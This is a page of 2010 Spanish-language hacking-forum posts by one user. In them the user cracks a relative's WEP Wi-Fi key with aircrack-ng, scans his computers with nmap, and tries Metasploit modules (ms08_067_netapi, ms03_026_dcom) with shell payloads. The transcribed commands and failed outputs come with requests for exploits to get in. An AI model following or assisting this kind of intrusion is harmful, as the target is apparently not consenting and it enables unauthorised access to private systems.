Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - cpu2

#931
Hacking / Re: Ayuda msrcp
26 Marzo 2010, 19:44 PM
Hola

Probe la vulnerabilidad del puerto 445 con ms08_067_netapi y el payload bind_tcp y cuando lanzo el exploit me dice esto

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows Vista Home Premium Service Pack 1 - lang:Unknown
  • Could not determine the exact language pack
  • Exploit completed, but no session was created.

    No me dio la shell, porque que falla, otra pregunta en los resultados de nmap me dice que hay servicios desconocidos como estos

    10627/tcp open  unknown
    49156/tcp open  unknown
    49156/tcp open  unknown

    hay alguna forma de saber de que se trata ese servicio.

    Un saludo
#932
Hacking / Ayuda msrcp
19 Marzo 2010, 20:33 PM
Hola

Usando la suite aircrack-ng saque la clave de la red demi tio, me conecto, estoi en el router escaneo con nmap el router y me salen equipos conectados, los resultados de nmap:

Nmap scan report for 192.168.1.32
Host is up (0.0067s latency).
Not shown: 993 filtered ports
PORT      STATE SERVICE
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
2869/tcp  open  unknown
5357/tcp  open  unknown
10627/tcp open  unknown
49156/tcp open  unknown
49156/tcp open  unknown

Vale puedo entrar por el puerto 135 que tiene el servicio msrpc con el exploit ms03_026_dcom se puede entrar.
Aki el problema ago un escaneo -O a 192.168.1.32 para saber que sistema operativo tiene, resultados de nmap:

Running: Microsoft Windows 2008|Vista|7
OS details: Microsoft Windows Server 2008 Beta 3, Microsoft Windows Vista SP0 or SP1, Server 2008 SP1, or Windows 7

Uso el exploit ms03_026_dcom y pongo el commando info para saber que hace el exploit:

Description:
  This module exploits a stack overflow in the RPCSS service, this
  vulnerability was originally found by the Last Stage of Delirium
  research group and has been widely exploited ever since. This module
  can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
  2000, Windows XP, and Windows 2003 all in one request :)

Como dice vale para las versiones  Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003, la maquina tiene Microsoft Windows 2008|Vista|7 no es vulnerable.

Buneo sigo el ataque asta que me toca lanzar el exploit como es de esperar metasploit me dice que me valla ala playa:

[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied

Acceso denegado, no es vulnerable por que tiene vista o windows 7, hay algun exploit para windows vista|7 para msrcp o alguna otra forma de poder entrar por hay.

Gracias de antemano un saludo.


#933
Hola

Encontre el modelo en ciudad wireless, pero como hay mas de 1 version y cajas, la buena es la azul la de ciudad wireless es la buena o la mala? lo pregunto porque estoi interesado a comprarla porque inyeccta y el precio esta bien.

http://www.ciudadwireless.com/tp-link_tl-wn422g_high-gain_wireless_adapter-_atheros-zydas_chipset-_2-4ghz-_802-11g-b-_4dbi_detachable_antenna-p-2657.html

Un saludo
#934
Materiales y equipos / Re: Duda Alfa 1W
10 Marzo 2010, 16:41 PM
Hola

Si es verdad e visto tu post pazienzia que estabas inyectando a unos 700 o 800, la pedire la alfa 1W, pero mira e visto una tira de precio con el chip Zydas 1211-BC (que es eso de BC no es rw) que opinas tu mira:

http://www.ciudadwireless.com/erize_erz-wl-usbrsma_stick_wifi_802-11bg_54mbps_conector_rpsma-p-957.html

Esa me vale para wifiway y ubuntu, si tiene el chip zydas 1211 pero cuando e visto eso de BC nose que es que opinas?

Un saludo
#935
Materiales y equipos / Re: Duda Alfa 1W
9 Marzo 2010, 15:04 PM
Hola pazienzia

Eso me pasa con todas las redes, yo me associo con la falsa sin ningun cliente legitimo, en ubuntu tengo los drivers de wifislax osea los r8187 y me pasa lo mismo con ubuntu y wifislax, ati te pasa lo mismo con la alfa 1W lo digo porque la quiero comprar, pero si me hace la misma pirula que la wisacom no, serias tan amable de mirar si ati te associa bien y innyecta bien con un A1+A3, pero associado con la falsa sin ningun cliente.

Un saludo y gracias
#936
Materiales y equipos / Duda Alfa 1W
8 Marzo 2010, 23:31 PM
Hola

Estado mirando por el foro y veo que la gente dice que la alfa 1W es muy buena, nose si comprarla porque tengo esta duda, tengo una WISACOM con el chip RTL8187L, el mismo que la alfa 1W, ubuntu 9.04, como sabreis ubuntu 9.04 tiene los drivers mac 80211 y yo segui este tuto de como cambiarlos por los ieee80211:

http://foro.seguridadwireless.net/zona-linux/parche-para-8187l-en-ubuntu-con-kernel-2-6-28/80/

Quiero la tarjeta para auditoria y para navegar y descargar bien, instale esos drivers, navego bien pero ala hora de usar aircrack-ng tengo este problema con aireplay-ng, cuando meto:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0

me dice aireplay-ng que estoi associado, pero en la captura de airodump-ng no salgo abajo como cliente, y no puedo inyectar con el A3.

Es problema de la wisacom o del driver, la gente dice que le funciona bien, pero si me compro la alfa 1W y me hace la misma pirula seria tirar el dinero, aaa ese problema lo tengo tambien con wifislax osea que seguro que el problema es de wisacom.

E mirado esta alfa de ciudad wireless

http://www.ciudadwireless.com/alfa_network_awus036h_adaptador_wireless_54mbps_802-11b-g_conector_rp-sma-p-1769.html

Poniendo esos drivers a esta alfa me ira todo bien, la compro, espero sus consejos.

Un saludo a todos
#937
Hacking / Re: [Metasploit] Karmetasploit
5 Marzo 2010, 16:26 PM
Hola  trashhgoo

Gracias por este buen trabajo, podria hacer esto con la red de mi tio que es wep, siguiendo los mismos pasos, pero haciendo todo desde mi ordenador, reventandole la red con aircrack-ng y hacer esos pasos, funcionaria?

Un saludo crack
#938
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 20:44 PM
Como es posible si NMAP me dice que es vulnerable a eso -.-
¿alguna idea? jaja

buena rockernalult me a pasao lo mismo que en la imagen jeje

Shell Root gracias tio pero al final no e podido mi tio gano, otra vez sera gracias a todos por ayudarme.

Un saludo
#939
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 20:00 PM
Shell Root mira es lo que me sale ami

use exploit/windows/smb/ms08_067_netapi   <------------- ningun problema

show options

Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST                                  yes         The target address
RPORT   445                         yes         Set the SMB service port
SMBPIPE  BROWSER           yes         The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id  Name
--  ----
0   Automatic Targeting

Vale me sale eso por lo que e visto en el video todo igual

set RHOST 192.168.1.32

set payload windows/shell/bind_tcp

show options

Module options:
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
RHOST   192.168.132      yes            The target address
RPORT   445                    yes            Set the SMB service port
SMBPIPE  BROWSER     yes             The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):
Name     Current Setting  Required  Description
---------   ------------------  ------------  -------------
EXITFUNC   thread            yes          Exit technique: seh, thread, process
LPORT         4444               yes          The local port
LHOST      192.168.1.32     no           The target address

Exploit target:
Id  Name
--  ----
0   Automatic Targeting

eso sale

exploit

   *  Started bind handler
     [-] Exploit failed: The host (192.168.1.32:445) was unreachable.
   * Exploit completed, but no session was created.

eso es mi caso alguna idea creo que lo ago bien?
Un saludo

#940
Hacking / Re: Ayuda Nmap y Metasploit
7 Enero 2010, 19:17 PM
Gracais a todos por ayudarme y contestar tan rapido

Shell Root
Nada e visto los 2 videos los e probado y nada me dice lo mismo en el segunbdo video que haces un payload windows/shell/reverse_tcp, cuando metes el RHOST 192.168.0.3 es tu ip? por que yo puse la mia y nada no funciona alguna idea?

rokernault

Como le exploto una vulnerabilidad de samba en un puerto de bittorrent a eso de samba me suena a algo de linux aa vaya imagen as puesto tio jeje.

Un saludo